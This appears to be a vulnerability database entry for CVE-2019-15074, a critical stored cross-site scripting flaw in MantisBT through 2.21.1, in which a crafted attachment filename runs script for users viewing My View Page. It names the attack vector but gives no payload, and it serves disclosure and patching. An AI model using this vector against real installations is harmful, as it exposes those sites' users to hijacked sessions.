Vulnerability Description
The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename. The code is executed for any user having visibility to the issue, whenever My View Page is displayed.
CVSS Score
CRITICAL
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Mantisbt | Mantisbt | >= 2.13.0, <= 2.21.1 |
Related Weaknesses (CWE)
References
- https://github.com/mantisbt/mantisbt/commit/9cee1971c498bbe0a72bca1c773fae50171dPatchThird Party Advisory
- https://mantisbt.org/bugs/view.php?id=25995ExploitIssue TrackingVendor Advisory
- https://github.com/mantisbt/mantisbt/commit/9cee1971c498bbe0a72bca1c773fae50171dPatchThird Party Advisory
- https://mantisbt.org/bugs/view.php?id=25995ExploitIssue TrackingVendor Advisory
FAQ
What is CVE-2019-15074?
CVE-2019-15074 is a vulnerability with a CVSS score of 9.6 (CRITICAL). The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after upload...
How severe is CVE-2019-15074?
CVE-2019-15074 has been rated CRITICAL with a CVSS base score of 9.6/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2019-15074?
Check the references section above for vendor advisories and patch information. Affected products include: Mantisbt Mantisbt.